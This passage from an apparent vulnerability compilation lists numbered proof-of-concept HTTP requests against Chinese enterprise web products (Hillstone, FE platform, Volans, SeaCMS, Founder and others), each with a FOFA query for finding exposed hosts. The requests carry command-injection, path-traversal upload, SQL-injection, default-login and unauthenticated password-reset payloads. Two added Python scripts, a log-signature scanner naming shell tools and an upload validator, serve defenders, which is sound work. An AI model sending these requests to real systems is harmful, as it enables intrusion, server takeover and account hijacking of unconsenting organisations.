        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 (Hillstone Networks 云鉴 security management system) setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
Request 1: fetch a CSRF token for the session cookie.
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Request 2: substitute the returned token for {{token}}; the param value is executed server-side and writes a marker file under the web root.
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Request 3: fetch the marker file to confirm execution.
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 (FE enterprise operations management platform) uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the target is vulnerable. The filename field is used unsanitised, so a traversal sequence places the JSP inside the deployed fe.war:

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 (Volans internet behaviour management system) send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
The name field of the JSON body is passed to a shell unescaped:
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 (Henan Fengsu Technology unified authentication platform) password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
The request carries no session; xgh identifies the target account and newPass sets its new password:
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 (Zheda Enter customer resource management system) Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV (aliyundrive-webdav LuCI app) command injection
CVE-2024-29640
The sid value decodes to `ls />/www/aaa.txt` (backticks included); a valid sysauth session cookie is required:
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit system assetsmanager/upload endpoint file upload
FOFA:title="Authenticate Please!"

1. Fetch the login page to obtain the CSRF value (csfr), then obtain a session cookie, then upload and request the uploaded file:
GET /auth/login?to=/ HTTP/1.1

Response: 200, containing csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT from the previous step to obtain a session cookie (the POC logs in with the default credentials admin/admin):

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with the session cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

The uploaded file is then reachable at:
/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 (SeaCMS video management system) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 (Founder omnimedia news editing system) binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
Decoded, TableName is DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH, so the table name is concatenated into the statement and stacked queries run (WAITFOR DELAY is T-SQL, i.e. SQL Server):
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

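For the defenders this compilation is addressed to, the quickest retrospective check is to run the signatures of these payloads over web access logs. The script below is an added example, not part of the original compilation: it percent-decodes the request target and body and flags the indicator classes seen in entries 186 to 201 (time-based and heavy-query SQL injection, stacked queries, UNION, shell metacharacters and os.system). The tab-separated record format, the sample lines and the placeholder targets for entries 186 (request line outside this excerpt) and 193 (token) are constructed for the example; request bodies are only present in a log if a WAF or reverse proxy records them.

```python
from __future__ import annotations

import re
from urllib.parse import unquote_plus

# Indicator patterns, matched against the percent-decoded request target and body.
# Labels are returned in this order. Extend for your own stack.
INDICATORS = [
    ("sqli-time", re.compile(r"\bsleep\s*\(|\bwaitfor\s+delay\b|\bbenchmark\s*\(|\bpg_sleep\s*\(", re.I)),
    # SQLite has no sleep(); the heavy-query trick in entry 186 burns CPU with a huge RANDOMBLOB instead.
    ("sqli-heavy-query", re.compile(r"\brandomblob\s*\(\s*\d{6,}", re.I)),
    ("sqli-stacked", re.compile(r"';\s*(waitfor|select|insert|update|delete|exec|drop)\b",
                                re.I)),
    ("sqli-union", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("cmdi-shell", re.compile(r"`[^`]+`|\$\([^)]+\)|;\s*(uname|id|whoami|cat|ls|wget|curl)\b", re.I)),
    ("code-eval", re.compile(r"\bos\.system\s*\(|\b__import__\s*\(|\bsubprocess\.", re.I)),
]


def decode(value: str) -> str:
    """Percent-decode twice: decoding plain text is a no-op, so %25-double-encoded payloads are caught too."""
    return unquote_plus(unquote_plus(value))


def scan_request(target: str, body: str = "") -> list[str]:
    """Return the indicator labels that fire on one request (request target plus body)."""
    haystack = decode(target) + "\n" + decode(body)
    return [label for label, pattern in INDICATORS if pattern.search(haystack)]


def scan_log(lines: list[str]) -> list[dict]:
    """Scan records 'timestamp<TAB>client<TAB>method target[<TAB>body]' and return the suspicious ones."""
    hits = []
    for line in lines:
        fields = line.rstrip("\n").split("\t")
        if len(fields) < 3:
            continue  # malformed record; in production count these rather than dropping them silently
        method, _, target = fields[2].partition(" ")
        body = fields[3] if len(fields) > 3 else ""
        labels = scan_request(target, body)
        if labels:
            hits.append({"ts": fields[0], "client": fields[1], "method": method,
                         "target": target, "labels": labels})
    return hits


# Constructed sample log: the request lines from entries 186 to 201 above plus one benign request.
SAMPLE_LOG = [
    "2024-06-05T10:00:01Z\t203.0.113.5\tPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject\t"
    "object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1",
    "2024-06-05T10:00:02Z\t203.0.113.5\tPOST /\t"  # entry 186; its request line is outside this excerpt
    "req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450",
    "2024-06-05T10:00:03Z\t203.0.113.5\tGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27--",
    "2024-06-05T10:00:04Z\t203.0.113.5\tPOST /CDGServer3/js/../NavigationAjax\tcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=",
    "2024-06-05T10:00:05Z\t203.0.113.5\tPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf=TOKEN\t"
    "param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')",
    '2024-06-05T10:00:06Z\t203.0.113.5\tPOST /send_order.cgi?parameter=operation\t'
    '{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}',
    "2024-06-05T10:00:07Z\t203.0.113.5\tGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist",
    "2024-06-05T10:00:08Z\t203.0.113.5\tGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20",
    "2024-06-05T10:00:09Z\t203.0.113.5\tGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list",
    "2024-06-05T10:00:10Z\t203.0.113.5\tPOST /newsedit/newsplan/task/binary.do\t"
    "TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1",
    "2024-06-05T10:00:11Z\t198.51.100.7\tGET /attachment?file=report.pdf",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["client"], hit["method"], hit["target"][:60], hit["labels"])
```

Decoding before matching is what makes one rule set cover entries 189, 198 and 201, whose payloads arrive percent-encoded; the sqli-heavy-query rule exists because SQLite targets (entry 186) never contain sleep() or WAITFOR, so a timing-only rule misses them.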
202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Substitute the __VIEWSTATE and __EVENTVALIDATION values into the upload request:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then reachable at:
/_data/Uploads/1123.txt

203. 红海云EHR (Redsea Cloud EHR) PtFjk file upload
FOFA:body="RedseaPlatform"
The declared Content-Type is image/jpeg but the stored name keeps the client's .jsp extension:
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--


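Entries 192, 194, 199, 202 and 203 all reach an upload handler that trusts the client's filename, the client's declared Content-Type, or both. The following is an added example, not any of these products' code, of a minimal multipart/form-data splitter plus the validation an upload handler should apply: basename only, extension allowlist, magic-byte check against the extension, and a server-generated storage name. The allowlist, the function names and the constructed byte-for-byte copy of entry 203's body are assumptions made for the example.

```python
from __future__ import annotations

import os
import re
import secrets

# Allowlist for an image/document upload endpoint (assumed policy, not any vendor's).
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}
CANONICAL = {".jpeg": ".jpg"}
# Magic bytes the stored content must start with, per canonical extension.
MAGIC = [(b"\xff\xd8\xff", ".jpg"), (b"\x89PNG\r\n\x1a\n", ".png"),
         (b"GIF87a", ".gif"), (b"GIF89a", ".gif"), (b"%PDF-", ".pdf")]


def parse_multipart(body: bytes, boundary: str) -> list[dict]:
    """Minimal multipart/form-data splitter: returns one dict per part."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:          # [0] is the preamble before the first delimiter
        if chunk.startswith(b"--"):              # "--boundary--" closes the body
            break
        chunk = chunk.lstrip(b"\r\n")
        head, sep, data = chunk.partition(b"\r\n\r\n")
        if not sep:
            head, sep, data = chunk.partition(b"\n\n")
        headers = {}
        for raw in head.decode("latin-1").splitlines():
            key, _, value = raw.partition(":")
            headers[key.strip().lower()] = value.strip()
        disp = headers.get("content-disposition", "")
        name = re.search(r'(?<!file)name="([^"]*)"', disp)
        fname = re.search(r'filename="([^"]*)"', disp)
        # Only the single line break before the next delimiter belongs to the framing.
        if data.endswith(b"\r\n"):
            data = data[:-2]
        elif data.endswith(b"\n"):
            data = data[:-1]
        parts.append({"name": name.group(1) if name else "",
                      "filename": fname.group(1) if fname else None,
                      "content_type": headers.get("content-type", ""),
                      "data": data})
    return parts


def validate_upload(filename: str, data: bytes) -> str:
    """Return "ok" or the reason the file is refused. The declared Content-Type is
    deliberately not an input: the client controls it (entry 203 sends image/jpeg for a JSP)."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if base != filename:
        return "path separators in filename"     # entry 194's ../../jboss/web/fe.war/hello.jsp
    if "\x00" in base:
        return "NUL byte in filename"
    if base in ("", ".", ".."):
        return "empty or dot-only filename"
    ext = os.path.splitext(base)[1].lower()      # a bare ".ashx" (entry 192) has no extension at all
    if ext not in ALLOWED_EXT:
        return f"extension {ext!r} not allowed"
    wanted = CANONICAL.get(ext, ext)
    sniffed = next((e for magic, e in MAGIC if data.startswith(magic)), None)
    if sniffed != wanted:
        return "content does not match extension"
    return "ok"


def storage_name(filename: str) -> str:
    """Server-chosen name: the client's basename never reaches the filesystem."""
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + CANONICAL.get(ext, ext)


def check_upload(content_type_header: str, body: bytes) -> list[tuple[str, str]]:
    """Validate every file part of a multipart request: [(client filename, verdict), ...]."""
    m = re.search(r'boundary="?([^";]+)"?', content_type_header)
    if not m:
        return [("", "missing multipart boundary")]
    return [(p["filename"], validate_upload(p["filename"], p["data"]))
            for p in parse_multipart(body, m.group(1)) if p["filename"] is not None]


# Constructed copy of the request body from entry 203 above (CRLF line endings as on the wire).
BOUNDARY_203 = "----WebKitFormBoundaryt7WbDl1tXogoZys4"
BODY_203 = (
    b"------WebKitFormBoundaryt7WbDl1tXogoZys4\r\n"
    b'Content-Disposition: form-data; name="fj_file"; filename="11.jsp"\r\n'
    b"Content-Type:image/jpeg\r\n"
    b"\r\n"
    b'<% out.print("hello,eHR");%>\r\n'
    b"------WebKitFormBoundaryt7WbDl1tXogoZys4--\r\n"
)

if __name__ == "__main__":
    print(check_upload("multipart/form-data; boundary=" + BOUNDARY_203, BODY_203))
```

Entry 202's 1123.txt is harmless on its own, but an allowlist rather than a denylist is what stops the follow-up attempt with .aspx; and because the stored name is generated server-side, tricks such as double extensions or a filename that only exists in the query string (entry 192's name=.ashx) never decide where or under what name the bytes land.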